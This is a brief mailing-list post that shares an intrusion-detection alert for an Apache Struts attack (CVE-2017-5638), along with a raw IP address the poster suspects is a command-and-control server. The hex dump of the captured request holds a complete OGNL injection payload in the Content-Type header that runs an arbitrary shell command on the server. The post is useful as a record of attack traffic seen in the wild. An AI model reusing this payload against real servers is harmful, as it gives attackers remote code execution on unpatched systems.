[1]http://115.112.66.194/login.php - C&C ? -------- Original Message -------- Subject: sTruTsz - Local Time: March 23, 2017 8:57 AM UTC Time: March 23, 2017 3:57 PM From: arpspoof@protonmail.com To: cypherpunks@lists.cpunks.org woah - woah - see see gone bad - ount:2 Event#3.474105 2017-03-23 15:18:28 ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) a.b.c.d -> e.f.g.h IPVer=4 hlen=5 tos=0 dlen=1086 ID=0 flags=0 offset=0 ttl=0 chksum=883 Protocol: 6 sport=45509 -> dport=80 Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=1319 chksum=0 Payload: 47 45 54 20 2F 66 72 61 6D 65 2F 66 69 72 73 74 GET /frame/first 2E 61 63 74 69 6F 6E 20 48 54 54 50 2F 31 2E 31 .action HTTP/1.1 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo 7A 69 6C 6C 61 2F 35 2E 30 20 28 4D 61 63 69 6E zilla/5.0 (Macin 74 6F 73 68 3B 20 49 6E 74 65 6C 20 4D 61 63 20 tosh; Intel Mac 4F 53 20 58 20 31 30 5F 31 32 5F 33 29 20 41 70 OS X 10_12_3) Ap 70 6C 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 pleWebKit/537.36 20 28 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 (KHTML, like Ge 63 6B 6F 29 20 43 68 72 6F 6D 65 2F 35 36 2E 30 cko) Chrome/56.0 2E 32 39 32 34 2E 38 37 20 53 61 66 61 72 69 2F .2924.87 Safari/ 35 33 37 2E 33 36 0D 0A 48 6F 73 74 3A 20 37 34 537.36..Host: 74 2E 39 34 2E 36 37 2E 31 39 36 0D 0A 41 63 63 65 .94.67.196..Acce 70 74 3A 20 2A 2F 2A 0D 0A 43 6F 6E 74 65 6E 74 pt: */*..Content 2D 54 79 70 65 3A 20 25 7B 28 23 6E 69 6B 65 3D -Type: %{(#nike= 27 6D 75 6C 74 69 70 61 72 74 2F 66 6F 72 6D 2D 'multipart/form- 64 61 74 61 27 29 2E 28 23 64 6D 3D 40 6F 67 6E data').(#dm=@ogn 6C 2E 4F 67 6E 6C 43 6F 6E 74 65 78 74 40 44 45 l.OgnlContext@DE 46 41 55 4C 54 5F 4D 45 4D 42 45 52 5F 41 43 43 FAULT_MEMBER_ACC 45 53 53 29 2E 28 23 5F 6D 65 6D 62 65 72 41 63 ESS).(#_memberAc 63 65 73 73 3F 28 23 5F 6D 65 6D 62 65 72 41 63 cess?(#_memberAc 63 65 73 73 3D 23 64 6D 29 3A 28 28 23 63 6F 6E cess=#dm):((#con 74 61 69 6E 65 72 3D 23 63 6F 6E 74 65 78 74 5B tainer=#context[ 27 63 6F 6D 2E 6F 70 65 6E 73 79 6D 70 68 6F 6E 'com.opensymphon 79 2E 78 77 6F 72 6B 32 2E 41 63 74 69 6F 6E 43 y.xwork2.ActionC 6F 6E 74 65 78 74 2E 63 6F 6E 74 61 69 6E 65 72 ontext.container 27 5D 29 2E 28 23 6F 67 6E 6C 55 74 69 6C 3D 23 ']).(#ognlUtil=# 63 6F 6E 74 61 69 6E 65 72 2E 67 65 74 49 6E 73 container.getIns 74 61 6E 63 65 28 40 63 6F 6D 2E 6F 70 65 6E 73 tance(@com.opens 79 6D 70 68 6F 6E 79 2E 78 77 6F 72 6B 32 2E 6F ymphony.xwork2.o 67 6E 6C 2E 4F 67 6E 6C 55 74 69 6C 40 63 6C 61 gnl.OgnlUtil@cla 73 73 29 29 2E 28 23 6F 67 6E 6C 55 74 69 6C 2E ss)).(#ognlUtil. 67 65 74 45 78 63 6C 75 64 65 64 50 61 63 6B 61 getExcludedPacka 67 65 4E 61 6D 65 73 28 29 2E 63 6C 65 61 72 28 geNames().clear( 29 29 2E 28 23 6F 67 6E 6C 55 74 69 6C 2E 67 65 )).(#ognlUtil.ge 74 45 78 63 6C 75 64 65 64 43 6C 61 73 73 65 73 tExcludedClasses 28 29 2E 63 6C 65 61 72 28 29 29 2E 28 23 63 6F ().clear()).(#co 6E 74 65 78 74 2E 73 65 74 4D 65 6D 62 65 72 41 ntext.setMemberA 63 63 65 73 73 28 23 64 6D 29 29 29 29 2E 28 23 ccess(#dm)))).(# 63 6D 64 3D 27 6E 4D 61 73 6B 43 75 73 74 6F 6D cmd='nMaskCustom 4D 75 74 74 4D 6F 6C 6F 7A 27 29 2E 28 23 69 73 MuttMoloz').(#is 77 69 6E 3D 28 40 6A 61 76 61 2E 6C 61 6E 67 2E win=(@java.lang. 53 79 73 74 65 6D 40 67 65 74 50 72 6F 70 65 72 System@getProper 74 79 28 27 6F 73 2E 6E 61 6D 65 27 29 2E 74 6F ty('os.name').to 4C 6F 77 65 72 43 61 73 65 28 29 2E 63 6F 6E 74 LowerCase().cont 61 69 6E 73 28 27 77 69 6E 27 29 29 29 2E 28 23 ains('win'))).(# 63 6D 64 73 3D 28 23 69 73 77 69 6E 3F 7B 27 63 cmds=(#iswin?{'c 6D 64 2E 65 78 65 27 2C 27 2F 63 27 2C 23 63 6D md.exe','/c',#cm 64 7D 3A 7B 27 2F 62 69 6E 2F 62 61 73 68 27 2C d}:{'/bin/bash', 27 2D 63 27 2C 23 63 6D 64 7D 29 29 2E 28 23 70 '-c',#cmd})).(#p 3D 6E 65 77 20 6A 61 76 61 2E 6C 61 6E 67 2E 50 =new java.lang.P 72 6F 63 65 73 73 42 75 69 6C 64 65 72 28 23 63 rocessBuilder(#c 6D 64 73 29 29 2E 28 23 70 2E 72 65 64 69 72 65 mds)).(#p.redire 63 74 45 72 72 6F 72 53 74 72 65 61 6D 28 74 72 ctErrorStream(tr 75 65 29 29 2E 28 23 70 72 6F 63 65 73 73 3D 23 ue)).(#process=# 70 2E 73 74 61 72 74 28 29 29 2E 28 23 72 6F 73 p.start()).(#ros 3D 28 40 6F 72 67 2E 61 70 61 63 68 65 2E 73 74 =(@org.apache.st 72 75 74 73 32 2E 53 65 72 76 6C 65 74 41 63 74 ruts2.ServletAct 69 6F 6E 43 6F 6E 74 65 78 74 40 67 65 74 52 65 ionContext@getRe 73 70 6F 6E 73 65 28 29 2E 67 65 74 4F 75 74 70 sponse().getOutp 75 74 53 74 72 65 61 6D 28 29 29 29 2E 28 40 6F utStream())).(@o 72 67 2E 61 70 61 63 68 65 2E 63 6F 6D 6D 6F 6E rg.apache.common 73 2E 69 6F 2E 49 4F 55 74 69 6C 73 40 63 6F 70 s.io.IOUtils@cop 79 28 23 70 72 6F 63 65 73 73 2E 67 65 74 49 6E y(#process.getIn 70 75 74 53 74 72 65 61 6D 28 29 2C 23 72 6F 73 putStream(),#ros 29 29 2E 28 23 72 6F 73 2E 66 6C 75 73 68 28 29 )).(#ros.flush() 29 7D 0D 0A 0D 0A )}.... References 1. http://115.112.66.194/login.php